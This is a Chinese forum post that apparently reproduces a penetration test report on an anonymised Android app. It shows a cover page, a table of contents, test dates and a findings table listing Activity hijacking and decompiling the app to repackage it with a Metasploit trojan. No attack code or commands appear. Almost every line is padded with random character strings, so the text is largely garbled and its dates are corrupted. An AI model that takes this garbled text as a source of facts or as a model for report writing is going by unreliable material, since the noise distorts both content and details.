找回密码
 立即注册
查看: 5034|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
) F( j# {; w ]+ e& F: X5 w 4 |3 s* k! g* k6 I# t

( T+ N, k) h! P! g9 I* }2 ~" Y2 c2 B, o9 T4 T& Z! {4 t
/ D6 j* x2 u U' J $ ^3 _4 i* p' L5 R6 b

. V% d7 l2 M. B' H% e1 G8 I o - W3 q9 g8 ]3 ?4 B
+ s' i( K- E4 Z j1 E! `4 J/ ]! L+ |6 n- [# Q3 U: j' M

5 T! |8 A; `4 U9 @8 T $ h* s: F1 u1 t% C& t N4 r! Z 文档编号:                / a1 V `' g% d. i' [- P6 U" s( B2 J a( ]; O7 |

, J6 ~; W1 _8 D) Y- Z# a3 F2 {' S , u! J( e+ }" R" {- ]4 z8 c1 n

6 m, b7 @9 M; T3 i 4 P4 C5 |. Z0 R. s, i) W; ?4 F   $ r4 |7 B* b8 L) u3 d0 K- F i

- }' }" i1 W! G/ s% X / K( k% q4 z2 }! h. O

: f$ t9 A2 M8 U9 v2 t; S/ k 5 ~* q. ]; C/ M& x5 t: ]   0 R+ W7 g! |2 u$ O* J - V \9 f, U6 M" ~2 X" r

2 Z* w4 v- l. n 4 }% z( x- d8 j3 f5 i7 i) |

4 E. {( X! q$ T9 ^% }" n d5 W+ i * C- A* t, q& a% G   ' ], F+ D: M' d* q. Z0 d; |3 }: o0 }4 p* b) Q0 S

( I$ Y7 j3 {' M2 H6 A9 z7 w1 K9 z6 ~5 b! S" `( |

* f# L' q$ A, e# K$ [ & f0 `7 d8 [( R( C- M   & a: f/ d. m9 X2 }- ?" k+ M" _' n- P& i. X

5 z, }4 k7 n# t8 j" A 8 L7 }& a0 z5 V" {+ {1 p

" a, c" u4 L# f4 w, k" Q ) b6 a' [: i" p' `" s9 h5 `: I   % y4 `- W# i) q' D& v9 ^ 9 N) U5 C9 r; ?/ F! `& o/ A6 W

$ |/ Y9 d$ F" H/ y! M2 v: l- W# J ( h. I' V5 w9 _3 ~

. c7 b- Q9 I2 r- Y ( a/ c" Z( X! O/ p0 p0 a 某某某APP渗透测试 + W6 S8 s6 M. e" U# E" s D$ e, |0 W& k- A+ W7 @& O

$ {9 r4 N8 L8 a( k" I 7 [! X+ I O* K5 @6 g, X

3 Z9 {+ f3 c! y2 w / n8 f5 \# l% V$ u1 [! g" C   6 G7 `- T8 D/ ~, S: v+ }+ m 5 H% L8 D* g% A& h

# O% U2 V& \. l5 D+ [6 n2 V2 O7 } * w+ n8 a5 Q* ]/ I; g, E1 v7 } E

+ Q5 h! A( N/ @* S- H : X9 K4 l; m. h+ @ k& ^   * L& B8 M) h' W! h ! Q4 k1 L* a7 _( |/ ?- Y. e

7 b1 F3 L/ _$ k# `4 q- Y$ R% }% h 0 h9 k/ n& M9 o: G

R. Q$ o) E9 @) s# U9 a, I% `; y a6 g2 |6 t   4 u+ S! V) Z; w6 b ' t4 M9 ]) } ]6 ~5 o7 `1 Y

$ z- @ q: t) i y 8 {. B+ A( o" D- J( U( o

" f1 k% h4 Q) U0 g Y # K: Z' T3 P- a$ q0 e% G% E   , }9 M% a7 w9 S( G1 h ; ]) H) _& n8 D& Z

$ _, G& Q/ p y& v- \+ u' f ! V% }2 B; u) T3 h3 `) d

! ]3 G- G T2 p8 M- p( ` , z2 d* K0 U5 Y u Q 技 术 报 告 L8 k" f& _1 v8 n$ A % ]3 Y/ q+ v: a X( J: I( T& r6 ?

' X3 S+ {1 ?/ K, n # I7 k. E* R+ C) ~7 J( t0 |

; d% Q0 }4 I/ G/ _7 J $ U5 v; S! \- Z" U9 B   7 p6 {: p4 |1 L5 l9 I3 f 2 k3 W; s) X0 t

, H N! ?, J F& A' M6 d4 M" v' J- G9 o

: M$ c2 C8 ]/ h 3 C: N1 W5 T. V& }# A   - g4 @# P# l6 s( _! \+ c5 N7 a0 P2 w% K' T7 z+ E

( w$ D6 ?" D8 r/ Y8 H+ y4 y4 e' z. b% ~

, X& A# z" L" ]9 s t% n% q" u ~% i4 z+ \1 Q4 d1 j6 z   2 w7 S2 B$ j& h- a6 o 4 p, [ M1 a( H y# x# _; J

7 f7 ]4 J) t( c/ a" @: f) A6 I$ [9 ] T! J" J$ W7 }- m( \: _: ~! v

6 I$ a$ M$ J, V# s8 m( u9 L- {- p F0 S' M& I   + j7 s3 \/ P) _, u/ e/ I5 k: b* g `6 Y0 w

3 s- R- P3 o- O. E/ W7 R) Z; N& w$ f1 e: A F

. _* i( `8 o7 P( h2 f; | * f7 O* [2 c) c; v7 H' C) @; a   " z r& t& Z2 {' q( G6 x 4 Y: m I. a- o& T7 U* L1 X

. [1 y" J5 x+ I! j3 o0 x- Y' t+ [- z8 C; o% i' C

8 q$ e6 z4 R4 v! m, L- W * V, |3 m- {7 W   - }$ u# |5 ?3 e7 I* |( p1 O$ h3 }

+ _7 D$ J: ^ M- k- w/ \- O {. c 6 K# h7 J$ _ }$ O2 s0 v, H

0 M7 ]' u& i/ v" @4 |% l$ R- U9 m h3 x" Y. H6 _& }/ B   8 f, k1 y9 T! ]3 q0 q3 `9 U: b4 m6 b' d

% L+ n) ~* r1 n. b- n , a9 E4 Q% F* F1 Y$ A

* r5 g, L0 l6 H . d% I! |, u3 E' ]' ^   , y$ i2 P' w+ H + c* @/ U; }. Q$ M

9 W& q/ {3 Q0 [ ( a" o# z; M! V5 @

' ]* Z) A3 x. Z/ R% p, T3 B% C ~$ m6 G" f5 B9 I9 v# t: m   ! |# `" @& @! {' J( \5 S ; `- v; I: Z+ J7 q

2 z& i; w. i! p3 p) E: `5 s0 Z# I7 l8 N. z* E! p

! `$ T( T$ M/ _5 \ ! K6 \) g+ |& g: ?# y   : @% H O ~, Z2 q; B ' _0 r; @! r3 j, k( |5 k+ H

: Z5 `, `( t& ~7 o) H# P8 ~, G # t: M2 R; R* G

7 o, }0 m: u: |, q/ j+ R0 s , T1 \) Q' M" Q% l6 \/ a   * S* Z- U) `% Z) a" S7 Q4 f + t! Y, T3 c3 T. Q. f% n

& {, e7 e# |; ? d/ s 6 L* ^" C/ Z8 e

$ G8 Y( V& j0 J6 p4 f; Q 3 h9 F4 a" W$ D r& D6 c9 Z! G# X   $ I( d5 Q& M7 a' H+ u 2 {' j7 y6 r2 N5 ?8 l+ f! p3 Z, T8 E

* z% B. @0 v4 E & C/ ?$ A: U8 _. f0 V1 j4 ?5 ?+ r

# m4 \+ G, }1 J/ G$ ^& v - g1 N' m* ^3 R9 S6 Q! D7 b: e   $ Y" P( Z! ]) R* ]% N3 P+ c0 w; F. M; ]

) S0 V+ m. x* J. D# i; R$ b 7 n/ j; q" Z9 ]4 e' E' H# K; ?

# g9 g5 e6 b0 c! O! a( T 0 n7 d4 D L& V4 R4 U0 u   : p" C5 _% l, @ G. C6 { 8 ], z5 V% m/ Y y5 g$ @2 r

4 N. u! O l- H) [" ]/ o1 N 0 M# Z C" d% }3 W# B, Q% Z

: G; {5 u P1 x1 D* n1 F p% E% T# M5 t" X: |1 q, L   % G v( N6 \1 `; a : F' U* a, G) ~% i# T2 [

* `' ` W7 d1 e7 t- J4 P- L. n# z( X* b: }8 ~7 F1 U

5 R. O/ Y* F/ \5 B% d! r ! U. X* Y1 T- g   : O; R% k- a( X* X" `+ R1 r" c8 z# t ! c. G$ n M/ v9 J

# C' ^8 m4 e# W1 V . N; W$ I! ^! j4 m8 l7 @

. }9 y5 @' {3 I) x5 d6 [, F- M1 B* b 3 f' n7 o3 f" x: e2 S" {$ b7 X   * y8 Z5 L' J/ ]4 }. T- }; f5 X) P9 L8 V; }6 n/ K

8 J' Q: M2 ^% f( O: L) P6 K. i 9 L/ {. s! K( q5 o, J9 l

. C6 k5 N* k) Y& f6 i8 i! ^% b ' |: {; r5 m2 S% U8 Z2 Q, \   * }, J7 O1 x0 B( ^( g; u+ k7 `$ t7 h3 P8 D4 V5 L+ ]$ d5 O. m& ]

9 j, }- m+ m. i# ] , ]% I8 r0 v9 R( \. [- |

( G p* `0 i4 c k8 L$ t; b9 d9 }4 Z& @+ E+ p7 E 二〇二〇年 1 j' r3 k5 b+ x' l6 W 3 T J' b7 g9 n* H/ O9 F1 ]

# i p6 W' A+ `9 K, M9 H! R) ]! n2 ~' @
2 B: @; P" u$ T. S5 y ! C2 d4 {8 j6 X. z: L
+ s; G6 U& L0 L ]4 A! } ; U6 t3 Y) a+ |$ n) L! | _
: P& p' `7 B! M* O1 T) L$ J! v4 N6 j8 F( z; \- _/ s
! ]& G5 v/ |' |6 A % V, i4 M6 r3 j8 d K
5 e% Q y1 \9 Q0 X' w5 e" S$ D) l& D
' m7 h; H" ~; E$ o- e- I9 X$ \1 U" d7 u+ p5 i
: N% H2 M5 g7 m& u 7 m7 F" i l" t% Z8 z
9 G, l. E0 s5 I0 q% D% d9 j + Z; X+ [( W' L& L# k/ Z

( Z5 D, |! @7 z1 v5 X- K 7 h$ e* o. V3 M/ a6 j( X 目 录 # [+ J9 v) E: K+ U' ^: f , B8 m) R, S' {8 D! l O q# U

0 g$ V! F6 w$ ]% I0 C5 ] - k0 F; n v% R2 s& y6 p7 i 2 F7 K3 N8 r3 \' O4 d ; B+ X9 z( z0 @! D, w

: A0 R+ K3 T& c" l1 j% q* m+ B & P6 a$ q9 y5 Q3 t2 T6 b1 f6 R7 F   E) w6 s! J" N% d: f ' ^9 L7 {; E: Z- X" n2 ]5 L0 s0 w' O

S9 a7 }+ P( @ j/ h/ j6 J, ? - V d0 {1 x1 L) \5 f% A

4 U8 V$ F z: G J, L6 E $ a0 Z! a; E8 R9 s4 m 1 概述... 3 : y/ ` G m( v- w8 n0 _- f / z, V3 D' ?# O) ]/ T

& P7 @# E9 |3 x$ D! ]3 o8 M2 C6 p' a# c/ B/ m

% W% \! j7 d( e" p* Y 0 p; T! `7 z! w8 H3 F) \+ e+ ^ 1.2测试时间... 3 / Z0 @) @7 I5 H5 I ; s, k& m* E) G1 r: L/ E; {! }9 b

6 ^7 f$ w# W3 k* b 7 K0 D I9 ]2 f* K1 f) a& {

0 {7 P6 K C2 ?2 p- e6 R% h& t% r- _) ]( L- Z/ D 1.3测试对象... 3 # p( X5 ]- J& S2 a' C$ d! ~! V0 G" t, a: K& \

, r+ I. X0 a$ r ( ?/ O5 y+ @6 x# R- c

1 H) L2 N4 j* W1 X% N; M$ C 2 @2 E) Y l5 x: Y- h 1.4测试结果... 3 & A9 u+ c, G7 y \+ G! O' c/ p6 ~3 R1 E; X! l/ P

; w5 y! J$ o1 v 1 O% U! o6 u2 B, I

% a, Y# _1 j! L% F 7 W% V( o: W2 n, Z" ?3 h9 L 2 检测结果... 4 ) T5 q; w$ Q+ W: }( S9 d$ C 1 `" \2 v( I) z6 i F

+ O6 s$ Q. @8 ?/ F5 s- R! e * b9 K: R0 m; F/ A" _- I3 h

7 _' N3 \ a+ S3 j6 h" E) c) h + ~+ s' }7 u1 I, _- b/ W( b$ j 2.1 某某某... 4 $ [: C* b4 S P: ^+ Z' S' K& h' F! K. H8 E. n! F( g

9 \1 n7 s* v' W1 U# R F# i! [) X7 e- b/ o9 L

9 z; I6 c+ O1 P! @: T& U m3 k ( z/ }( f1 C: K3 L 2.1.1检测目标... 4 : [( S! `5 ~9 \ @; D0 m$ R6 K7 U& w( @0 d; z

; @8 X+ G' L! g6 w8 d5 c! s A( H$ T) n: F, C

' v- u7 z+ `7 ~; i1 p5 o" N / P* x$ J" R# [ 2.1.2检测结果... 4 8 D! Z0 W: O0 O2 t H 3 }! o- L+ M5 o$ w; q

, k! t2 p9 X1 E6 @4 k) Y& A, Y3 I6 f6 v3 u. Y' k' p0 \7 t6 Y1 n1 k q

. v$ N- q' h6 R% @7 j( r4 S 0 X3 [! L3 U2 V( u4 f( S( V 2.1.2.1. 4 & ~+ Z5 X) @ Z+ p, y. H9 [) L! x+ E6 a' T3 M

' N- A) U% h$ r( |% o! A+ n- c8 c6 z. I9 \3 V) U: r% ]) a

3 ^0 k0 T# }0 |' y8 O& u1 q% z. \; s 2.1.2.2. 6 0 ]5 z, X( `% d3 Q Q & j0 Y* j7 Y! g M/ X$ | i* H: L" l: G

. f9 }9 _" A: K$ d- T% L% N7 j9 m 0 A1 C; N- V6 [8 ~# ^

5 f" b" n) Z% D: F( ^) y0 i' i8 k, {5 e8 t* M( E 3 K4 I2 @* E4 Q8 g9 }4 i 0 C& Q' K6 x% r) i" S) l4 z: W Q

2 V2 U, g2 ~1 g6 O + X: d$ Y8 n/ o8 s, P. _
+ ~8 o, `4 y& A e' E+ c. A4 L# ]& C
# `7 z* G. R( `. F( h, F8 h @: \ h7 c, g6 J
$ r3 J# I3 ~7 z6 n/ z0 T" u ) O( K+ W" e4 s5 `- T# B/ H
1 w' {0 O# D3 f! V/ _7 |1 o1 z G4 S4 `" W8 C" S

1 R9 l5 v9 |' M/ | ' K! o! A' L) w 1 概述 4 Y8 b" \! C ~& b6 w 9 ~2 v# C# P0 H& N

6 t v; i, F H* s+ u. N 3 y: k" p+ v$ k, ?

8 y: j; L# y, ~+ ~3 x2 K, g4 f# V% N ! @' P: I$ |4 Y* [- `. E 1.2测试时间 * @; i) q! v1 p 1 B1 g) s# r0 W- j* D7 h

4 H h5 o( J8 M5 i 4 q7 p: t/ w2 s 7 X9 Q. `: T: L9 ?1 x$ I/ f$ c* b, Q* m5 s7 {& N i1 _+ g/ }( R2 x+ h. [( p$ o+ `2 Z) d' }* L" T% y' i' F, C5 j! L- t* x, @- ^; _6 B2 v7 \' D- R3 ~/ R9 ~ W3 V' v( x3 F' U- `9 H" V8 [* J5 d. X% G$ v2 b4 H6 _& K/ i h) [6 k/ ?5 z5 S6 u) l2 m+ j F0 K% M- _3 J9 s% ?7 ^$ I) k3 m3 j+ H4 p& p& G3 {1 j* _7 u& z; u/ ?) a' [+ l2 o% S3 q1 n" H# ~! [$ A7 l7 w- P8 H9 u) g4 G% A0 ]$ f6 q& b& S1 C8 T" s' t8 M' s- ?- L2 e6 s, y9 k, T6 H" [+ E' t0 M3 L0 l1 d1 K. q' b% z8 z: D/ r* h0 `$ ]+ s7 R0 Z8 U; Q6 N% E4 P t ~5 b% l! a* F7 \2 I6 ]6 i; }& J/ |! J9 b* D& L: f2 m! l6 H/ [3 ^7 r0 J4 L1 s9 s& v; Q2 ^ P# u5 ]5 A1 T2 x* S) V k6 e
+ I* Q, O" T: c" ~) _ 6 q% g* p; K0 N# h8 Y+ P2 ?

9 \7 Y* V; q( D& h. B 4 I% @. b8 V4 l6 t g 渗透测试时间 0 B/ w, K' ^2 f" ?. i' n+ a 7 y) g$ f" m) P. v# ~1 ~

; l0 S: @% m% ?8 g! V 7 T' h i! k' v! y" w
. T2 r9 l. D5 Z0 g6 {# x& Z( Y) B . W6 _0 e3 o* o9 m

5 x; ], D" t7 n5 M - m/ [/ T3 H# Y2 N7 E 起始时间 8 g8 K+ U( j6 Q% e9 n( G# R4 O, i* ?$ j' i5 T' D4 J

% k- l1 J, Z5 q3 Q# L 6 I, C; |; m$ H3 E
2 ^5 E) d4 s- x* \3 [- X* e* G! _ ( X4 ?5 O5 B) P* F [+ K5 f

( g. n% ? ]5 K1 G ! k- i% T2 R& |4 m 202046 - b8 P1 a* C! R" |! M h9 ]8 M3 b( s! n' v

* s, X. s: D6 e" Q& ] ! \ ?" U( X2 S n
1 b' j3 o+ g J9 G6 x/ b y* `: R- y6 V3 Y! e1 z, T

/ I# P: e" u) b& v; |) J: |% p2 M # a; V' n1 u) a! f* U% h7 g! S 结束时间 1 a; ]+ K0 N3 C; v2 w0 o- U+ |2 K+ I. R! @* G. O# ?& h

& Z5 i7 [. [5 P: M- B3 R 9 V$ }% u- P1 `: n2 x
) L" U5 |; D" ]1 y; R: n/ x0 V% X3 Z" X# [/ ^" D+ X- Y6 f

; b4 i) p+ Y$ j! [" n- k * S2 z! c! k* P+ v5 e# ]; L! h 202049 & @5 Z( F$ K& A7 }4 k3 m, A" h " i3 Y, m. ]5 ]( |7 m2 H

( l, O, m4 M; S& a . Z: i: C9 t$ [( P6 m3 U! B
; @) J1 ^8 u9 d8 ?2 K' w/ |4 R ! I U$ E! m, p& x. {# G$ ?9 e- x

: p7 ? \* T7 j 3 u; C. x9 b8 ]) o2 ]. V# b 1.3测试对象 4 S* u$ e$ `9 c. [1 [ 4 u/ ^1 ~ F& J+ F% }

, ~7 y2 w( ]/ i- y 5 `9 E' m2 `9 \9 {3 L

+ @; {5 D% o) A3 h" m& z) y N; C: y' ~5 T! K 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: # U7 F2 U8 B, r" t& m( R6 {5 m! I6 I. H5 l6 x: p

, l3 a0 d; i* l5 Z , r% e5 Y/ c6 k q6 B& Y( I

. }0 R) x" h8 N" P/ b a7 R: `; g$ ~ 2 a- D2 Y& b7 h f3 h 1-1 检测对象 ! h1 Z8 A3 \! V: V; Y. F/ J% `* [* r# O5 A5 ~5 V* v5 @

0 H8 e6 h: f( ^ F8 n" y/ r% [- c7 M* T. G v; A' q; T D0 X9 ~( I. `0 y& p3 y* x6 [+ T! y! c2 R! }' A7 S" f* M s/ B# t) Z* B$ `3 W# X. G2 L+ y( M8 U# R, b( ~5 z) G( `2 y; t# W" ^9 A p( [1 S9 n( u6 `6 @8 W+ z+ U% j- ~/ R$ y5 ^! s1 e2 y; l, }6 u& u6 z% h0 @* Y* |6 U- m, [/ U" b+ c* u; `9 P, D; \" i& ^" A }7 I) [# D% j9 J+ M7 T4 N( @/ [0 E/ a* v* n- A' r* i$ K- S x" i- k I# t- s" @! P( D) M. Q$ V' ~ p1 s8 Y2 \/ x2 n4 k/ O$ X0 F+ g8 Z+ P8 \' F$ G/ X! ]' x: W- U+ M5 z1 ?2 e% j5 Y, B" ]: p" _5 O8 |/ h5 V6 K" Y, K4 B" _% e: h$ {. `$ O/ G3 F7 G; [! l5 p) v$ w/ G* a! W& l' O! E: _3 {1 w7 Y# ^: W% E4 G" P4 S" t3 C. `9 @5 v& M, j) R5 z3 q: n1 l/ z# Y( e: M* _2 z( ?$ f2 ]' E- P5 K& T) R) ]- J: U" K; G9 E0 |& C' d( {, h# u1 l& G e# i% e" g2 g5 ?2 M) h0 J3 M, {! S, P
/ K- _( n+ P1 g. M 0 f( k7 A5 E+ [. o5 g9 h: B

% {( D! ?- c6 \; \+ ]7 L. H3 X - k2 E) E! _- x' j! U 序号 ) S. b6 b! F, D7 x& v Q& J8 y) c% c% o* I* A

% r; a; R& v( u3 t / \; F* \( u. w: e5 @. l! n
2 \6 D. @. h; n/ H * t* l$ p% M! H, f3 Q# ?. j

' u# I c1 [8 c- s0 ]2 a8 p( O+ i1 A 测试对象 4 y: ~7 C/ {0 _' K/ o" V! j$ I 7 Y' K! t% m7 d; v& j" L: V! l# [

8 |- L- L X9 [" [ ]+ e5 c9 W7 T- ^! E) x- w' Y5 O
$ {6 y- M, W% x, }9 P6 u9 Q 9 r$ D3 V4 l# m4 O* i

# l, B$ `+ P6 O4 w 1 t2 A ~5 i3 j! m9 X' l$ | 测试地址 % g2 T' Q) F) y+ v. G6 S; o ' B6 W' }) `0 u, Z# y2 X

) A' ^& ~1 R" Q. ?! p" l, D9 E 8 F2 O1 E( f# E. M
5 z+ u$ |- x# q! p" h - b, U( p- t) b X( P5 c# U1 G# r

0 W, W1 Q( m$ H6 `" A + N K! E" R! k/ ^2 C 安全漏洞 9 V O) \9 h+ G! h; ?% d" t$ z: g 3 f8 h5 e' M7 {/ N$ Q1 e3 n

9 Q* d) l- g _+ q2 I# ` - ~( ]* r7 J. j6 {* c
- m, E. k6 H9 r3 t6 _ ) B$ O% @7 x6 i4 N, s2 a

* b8 u* g7 L+ @/ Y- _6 t. `7 J a; a & _% E3 _- X& }3 b$ W: T: V4 ~ 1 Z( z) E6 Z! m- {, Z* L; k : m2 V3 D- y3 U& B8 I( e

& N; g* B4 _2 L0 n 2 m, C5 m7 H5 K: v
7 q# z. T8 O: l* B 3 s' W J: g$ |" ^) u0 Q* C- B

p [1 L: e' S: ^: ~ 4 n( ~# t; t$ E# Y8 n 某某某安卓APP 1 `( L0 J3 V9 J' c0 `+ c- i + R/ j9 a* }0 N5 s$ e+ l

% e* p# E' y: s : A% C3 X8 D0 o6 K" [: r
5 J7 g! j! S8 S . M6 @2 j: a: w; P0 Y. R& T- `

+ Y# Y+ d; E: p h9 _ ' O% ?+ @& X+ b' c* U! ?6 M& n7 H   ' Z# v& j) _3 @+ R' G* W2 X6 O9 t5 i( x9 z5 u

3 T6 E3 I$ I6 v& T' C \- Z ; a0 g+ d& I: k, E6 Q& N5 b$ B
8 i/ W7 Y) s x4 l9 @4 l. F 3 S- ~! z \* {" @" P# I- D

8 V- @: S% Y7 U) h1 H+ \/ x1 Z4 j / e* B! l, k# O, A 2 " G- @+ f3 p& T4 m! \ y: t 4 N- j7 l* X& I

' r. k! Z3 p6 g ! X p& R! j) `1 x- J& n& c% r
6 }2 r7 u- u8 v 9 Y- z" k2 r+ q2 t

5 { l% I3 @9 g7 s 6 V1 M. G6 C8 [- n4 n( K, ]( X* U 1.4测试结果 - p) h7 t1 N. [4 s, V# k' C2 J, R % I" w( \7 B0 y

* q1 [" F2 I) S# _( w" C! D" \+ \! V0 o- ?. ^0 Q* K

1 Q/ C- _4 d H9 }2 e 4 `) F/ B2 s- o" p+ j9 U+ C. A/ p! y 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 9 s8 S U! R3 M$ s 9 D7 @2 `' x% d2 x# P

" x$ t" w( q! T4 Y) _! O/ n4 @5 y) F% k6 l

- {- I$ s, A) u+ q9 V7 d; d 7 a( G" X, u7 q- x( n5 C8 d   9 n( e" y1 X4 y" I( A6 e ; g( M5 V: Q& {4 w' f) L

* ]6 ]$ c9 ~& Z2 U) i( \ . r" [# \' u9 J+ d9 A& M' |' g) m
# C- Y% J; Z' X; z! i( O9 X0 f # V# X4 I: g6 G- _1 I; u3 `7 w " ?" _! L/ o+ f4 }( V: _. v. A5 _6 s9 d% y6 s; A$ @+ n2 C, i+ s" @1 c1 {6 t" Y1 v2 l% F$ m m: S, J2 G" \" P8 D5 M0 n& S8 r- [( L( O. E+ @& T% ]& x% j2 S& {. {% {9 {6 Q* b" ~/ ^, D: t7 {# |$ y S$ y- H" K+ ?( K- |. l- N% Z. ?3 \' C+ N4 p U3 T" G( \! C9 q( a& f; e2 ~$ d4 h% l0 n, a/ e' Q- ~& l2 X4 ~4 S7 }( U# n8 a s, f! P5 S4 g1 G! H( E# ~6 ~+ h' t; K: Q( N6 e5 z, b3 [0 a( H# P2 D" R+ E1 [% t. [7 M9 N) m# _( a* k7 {+ S$ k' m B! H/ k _' A; O' D, Z; r- G) A9 U6 y/ y$ [% K4 Z% @) S* H2 Q. C U& L: d, V" I/ m$ y: Z! g# B7 j1 W0 E2 K; l. X! ~2 X+ Q) k! [. u8 b- D4 D6 g S5 E" E2 t" y3 F& d( q% ^; `' r8 c7 s9 Q+ z/ x! E4 C4 G, S$ k1 o" O! ]+ N, M7 j" U& l$ C8 X: S P* W8 c. }/ i/ T( e. a8 ?8 t# U( i \5 P2 l2 z' S2 z+ v7 A: z, J7 ]. H% E% U8 g$ Z: W5 j& N+ \& i, m) V% B) ?& q( t' Y! ^( X/ s5 L' w* a6 w) X% y) z0 L5 L2 x( Z; e* }% B3 D/ C3 F+ E% {5 s0 E N+ R0 z+ y' N! `( @5 T5 \! G% L8 H7 Q% C" H' X( G5 Z1 |* v B+ N% T7 l6 l* L" F3 I& f# B7 `1 q+ d1 W! t0 g9 |5 O5 r) U; [, Y% Q0 G# ^! S9 K( j6 p+ M3 z, S4 n; i6 b7 ^" X5 L, ]3 K7 r$ ?4 R& a3 O+ ~7 d, J5 g# B$ U# C; n; \; r+ Z: G! g3 j5 [& |1 t8 M! a E5 n/ b2 T- ~$ n) Z! b; s: L5 Z9 m: Z
9 e/ [% J9 B( H2 ` # B' h+ v% F1 w+ Z" l

% P" l% _6 _% P# Y3 w 2 I) B. I# `3 N2 u. q0 B4 n( H% ]1 E: j# x 序号 # H1 A0 U" z1 r% c) k$ U3 p( ?% v, p9 K, }3 A: M7 S2 }0 b/ v: t

0 {7 q, t* X8 y+ H1 c* z0 f \ 5 m, v8 A7 w% ]( C) ?; p
" d9 }. R' \6 q' _+ Q& b" T1 M' l5 L4 Y ; Z C: L' l) O3 {

1 c. C# A$ O( m+ k 6 C. J' E4 [ X8 x2 X9 @$ ~' ~ 系统名称 " r; n5 S/ e. O6 j- i & @. |. W, B# y* E

5 V* G" a" L4 ~, {+ g9 t 4 S0 N7 d6 Q& F/ X: T/ J
0 K) W: y4 \$ {. g. @" z$ A6 F8 D1 ?. X/ v

; c) v! ~* d6 H; {& o" E9 Q# Q) U! }8 r8 b 漏洞名称 4 x4 D# ?* n6 h ! P* ~8 L& J, c* g. K7 w, K& J; v

" f9 H6 p: ^. A 8 e* T- `% i& {6 t
3 @ H/ u6 x* K) D: J k( I' L # y7 a: C8 b+ t P( \+ F5 o

1 e, I, Y; Q8 Q- w. S + ~1 |2 V2 B9 l- M0 ^: l$ _ 漏洞危害 " P' w5 l' z' X$ X8 \6 f6 u& m! K ' e; R7 G- Z( x9 |+ B0 X

( d' }! B, v) K8 `7 u9 J 9 d. a, h/ l& U
" a" Z3 v+ |9 ^- @. G$ k/ m( `0 y# g( y* \) K+ g: J

2 Y2 u- A3 T5 [. s& [1 O- Y / ^* t* v: T1 S! |# ` 修复结果 7 T0 K" Y' ]# N+ S! w G" T5 p' K 1 b) B' B7 d% I+ m' v

5 } U1 h5 \$ u( C$ v ; E& O* H; K6 C) F
2 O) G1 E4 t1 X 4 ~ _8 @8 L0 G8 f3 P

J( P4 I6 z" h2 b2 p( x ' M5 C: k0 O/ p 1 9 z' l$ q+ y f N0 @8 g. ], D $ }/ ]& g$ {. f8 `8 Q

Y2 B+ L* L- J% _" `" O) V - I+ v& P% H) k( d o
K7 Y9 i( c. l4 Q $ M2 Y* k% A, c% B/ s

: c+ u; W+ ^( M6 T( X$ G6 I8 f2 z / n) j/ z, e' Z! G0 I 某某某某某某APP % M' [& [. N* z1 _: S* q) f9 t& q* D/ V+ q2 `

/ N9 I% n8 O1 [ ! B9 J0 }1 _5 k, E. X
0 M/ M: X6 W2 i" X( X. b 1 d% @5 Y0 A U" q% B. U

, `0 L* z" X L ; m9 G5 k9 K3 i w- B7 q Activity 劫持 ) u0 X& x+ f1 T9 t+ @! E 8 ^/ c7 j( }; `4 b, ?9 ?

3 k$ F' V; y8 K0 j* ~ ! Y7 e H9 J1 |6 h* x: j

7 [, D1 z& e' M9 L F, h* g: G9 v. h   1 l, Q7 W7 k b9 }. I- ?" Q3 y" Z + A' S/ u$ H X1 I6 O2 O

. V, O+ q2 m; n# R2 x) `" L: z$ U/ `& l& W
/ k, B, H9 t: l. q, T 6 g- I! [8 K2 [; z9 H9 L

! a5 s w6 U# Y3 e A: O & u$ X' q7 {6 a5 B" w9 [ 8 X- V8 l) c/ r# g% W* P( N ; |1 B0 F( e2 }% z

+ W" x% s( U) I1 R; g, e$ `7 \' _: Z+ ^. C) J
# i0 e/ Q, u' n/ X8 ]* s1 Z4 _$ s8 e: U% ~5 Q* Z3 f9 X% V0 ]+ H

5 G+ x5 q6 k% M' ]! A- C" S# W & x+ p' g( u. s- l: Q9 D. P$ w( l   1 r( i" A ]* d/ L - Z. L* a1 A1 E I! d. a

' p8 G# K ^$ x3 j& q0 _7 ?& _ % @8 C6 _ @ F/ c
6 t3 @* ^$ X( u+ G2 g+ M . n0 Y1 A3 f4 C1 ~

2 O: r# w; @6 \& z3 E P7 F+ x* P4 v7 A. V* V6 D9 O 2 & m; r( v, x4 k* [3 G ( ]' U b0 k$ D" U3 B; V

9 J/ y ] D# O+ e9 |1 Q* Q5 l$ r7 t- E2 F+ P. ?- F1 U2 i5 @# p
' x8 t. u/ n% c* R5 C j* V 8 J' k) @& U& x+ W6 _( e8 c# U: Q

% F: i: S; s# y$ b' t, H / V# O% X1 e* n" e- t 某某某某某某APP # M+ a/ n) Z- N; J5 ^3 I# s x) H, G. V+ t

" b, }" y- H7 _3 k$ t9 s ! [; U2 O& H" d% u1 H
, B3 A6 ?# h1 j8 H* ]# L# i 3 {6 o. \* K/ Q0 j

$ _ ^/ _1 r6 J5 i4 [% ^; P" H* f2 h7 T9 Y9 `/ ]$ H, E 反编译二次打包捆绑木马、篡改APP代码 5 P+ R+ j6 k$ _3 b+ d9 o 9 |/ B7 a y, F- z5 H' d3 i

* z9 ^" A8 P, m" C% }. b: ` Z% A/ g2 z: {
! G& p }, d* f : l5 G' S$ u# q, V( Q' j" {

( c3 Q" [1 u% q# \' t % u" Q; N( X# Z1 l " d9 L6 B( o& ~0 q+ l5 A4 g0 h 7 P& Q7 Q8 S, c6 R% U

' r2 |$ X& K7 l/ i$ U% f% b, e+ A " y: O0 C" l a/ Q L
; ^4 m2 r4 f% g' M% u , t9 \$ }7 `0 C" Y6 s2 m' u# b

* j3 U" n' g( G: ^7 X / }! @7 [7 a. u# \   + [' f! k5 v" o6 s3 b9 a6 j, j & R! V3 m; b' H8 B/ p; F

7 p. a; l. p) |# C( J " ^! K5 Q1 w1 m
' o6 C! \. \3 ^9 D" i% P) }6 G' T S9 \3 {
* b; h& ?: \4 W3 E. B : w. Y' e6 ?+ c9 j: a$ f0 d

: d5 E: W7 J G, E% n + g- g( I) a, F' X; y   ( [6 {1 p+ g! L7 E5 j& k8 A4 O 3 c+ x$ @! l0 _0 C0 H

% G. d" l" `/ p% [% Y 2 R$ d: N+ A+ T! J7 H

